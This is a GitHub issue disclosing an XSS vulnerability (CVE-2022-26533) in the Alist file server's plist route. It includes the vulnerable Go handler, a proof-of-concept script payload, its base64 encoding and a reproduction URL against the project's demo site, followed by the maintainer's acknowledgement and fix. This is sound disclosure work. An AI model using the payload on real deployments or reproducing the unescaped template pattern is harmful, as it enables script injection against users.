Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Alist has Cross Site Scripting (XSS) vulnerability #645

Closed
Le0nsec opened this issue Mar 1, 2022 · 3 comments
Closed

Alist has Cross Site Scripting (XSS) vulnerability #645

Le0nsec opened this issue Mar 1, 2022 · 3 comments
Labels
vulnerability A defect in software that could allow an attacker to gain control of a system

Comments

@Le0nsec
Copy link

Le0nsec commented Mar 1, 2022

Alist Version / Alist 版本

v2.0.10-v2.1.0

Describe the bug / 问题描述

Vulnerability Introduction

A route in Alist that uses user-inputted parameters when displaying xml files and does not filter them can cause xss.

Vulnerability affects version: v2.0.10-v2.1.0

Vulnerability Analysis

A new route was added in Alist v2.0.10: /i/:data/ipa.plist, which allows users to control the data parameter in path.

image

Simplified code:

func Plist(c *gin.Context) {
	data := c.Param("data")
	data = strings.ReplaceAll(data, "_", "/")
	data = strings.ReplaceAll(data, "-", "=")
	bytes, err := base64.StdEncoding.DecodeString(data)
	if err != nil {
		common.ErrorResp(c, err, 500)
		return
	}
	u := string(bytes)
  plist := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
...
                        <string>%s</string>
...
					<string>ci.nn.%s</string>
...
                    <string>%s</string>
...
`, u, name, name)
	c.Header("Content-Type", "application/xml;charset=utf-8")
	c.Status(200)
	_, _ = c.Writer.WriteString(plist)

The incoming data is decoded by replacing (recovering the original base64 encoded url conflict characters), and then the parameter u is directly spliced and output to the page, so we can use this to construct the xss payload.

<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

The paylod is base64 encoded as follows:

PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4=

Replace = with -, then splice in the path:

http(https)://<host:port>/i/PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4-/ipa.plist

Vulnerability Exploitation

After a successful local exploit, try using the official demo site to test:

image

Reproduction / 复现链接

https://alist.xhofe.top/i/PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4-/ipa.plist

日志 / Logs

No response
@xhofe xhofe added the vulnerability A defect in software that could allow an attacker to gain control of a system label Mar 1, 2022
@xhofe
Copy link
Collaborator

xhofe commented Mar 1, 2022

Thanks for the report, and I'll fix it in the next release.

@Thiasap
Copy link

Thiasap commented Mar 1, 2022

大佬牛逼

@xhofe xhofe moved this to Todo in Alist Mar 1, 2022
@xhofe xhofe added this to Alist Mar 1, 2022
@xhofe xhofe moved this from Todo to In Progress in Alist Mar 1, 2022
@xhofe xhofe closed this as completed in 6af17e2 Mar 3, 2022
Repository owner moved this from In Progress to Done in Alist Mar 3, 2022
@Le0nsec
Copy link
Author

Le0nsec commented Mar 12, 2022

I applied for a CVE with the number CVE-2022-26533.

@github-actions github-actions bot mentioned this issue Nov 5, 2023
Closed
4 tasks
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
vulnerability A defect in software that could allow an attacker to gain control of a system
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@Thiasap @xhofe @Le0nsec